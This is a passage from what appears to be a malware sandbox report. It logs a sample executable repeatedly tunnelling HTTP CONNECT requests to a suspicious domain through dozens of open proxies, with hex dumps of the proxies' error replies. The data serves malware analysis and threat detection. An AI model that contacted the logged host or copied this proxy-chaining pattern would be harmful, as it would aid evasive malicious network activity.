                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.475277901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      490192.168.2.45162523.19.244.10910806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.781023026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      491192.168.2.45141952.172.1.18631286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.781030893 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      492192.168.2.45159698.170.57.24941456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.781264067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      493192.168.2.451452121.128.194.154806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.782654047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.064145088 CET340INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.12.2
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      494192.168.2.451594113.30.149.76806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.794248104 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      495192.168.2.45160472.195.34.4141456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.801521063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      496192.168.2.45159380.67.8.6806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.804406881 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.002098083 CET343INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 182
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      497192.168.2.451466103.197.71.7806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.805221081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      498192.168.2.4514608.213.128.6200026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.811022043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.115375996 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      499192.168.2.451431171.247.98.9010806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.816942930 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      500192.168.2.451669172.67.181.85806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.820410013 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.908010006 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      501192.168.2.4515648.209.255.1331286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.821527004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.443761110 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.761635065 CET38INHTTP/1.1 200 OK
                                                                                                      content-length: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      502192.168.2.45161551.15.196.107163796812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.827619076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.365631104 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.865962982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.866152048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.865825891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.866275072 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.866195917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.681570053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.194319963 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                                      Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      503192.168.2.451428182.253.112.18680806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.827714920 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.587009907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.643760920 CET39INHTTP/1.0 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      504192.168.2.451454128.199.202.12280806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.831787109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.176453114 CET28INHTTP/1.1 400 Bad Request


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      505192.168.2.450820104.23.119.91806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.832407951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.919958115 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      506192.168.2.451598195.66.156.19610806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.832653999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      507192.168.2.450780107.180.101.226230316812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.840137959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      508192.168.2.45154858.234.116.19781936812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.846301079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      509192.168.2.451477218.75.102.19880006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.850275993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      510192.168.2.451430183.230.162.12290916812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.850380898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.680856943 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.056762934 CET325INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.12.1
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      511192.168.2.450938142.54.235.941456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.852006912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      512192.168.2.451605154.236.189.1519766812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.856659889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.443790913 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.211452961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.537849903 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.169982910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.835077047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.647180080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.929105043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      513192.168.2.45164451.15.21.216634256812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.858094931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      514192.168.2.45166174.119.144.6041456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.860347986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      515192.168.2.45078491.189.177.18931286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.866518021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.379933119 CET1286INHTTP/1.1 403 Forbidden
                                                                                                      Server: squid/5.7
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 3532
                                                                                                      X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                      Vary: Accept-Language
                                                                                                      Content-Language: en
                                                                                                      X-Cache: MISS from lb1
                                                                                                      X-Cache-Lookup: NONE from lb1:3128
                                                                                                      Via: 1.1 lb1 (squid/5.7)
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 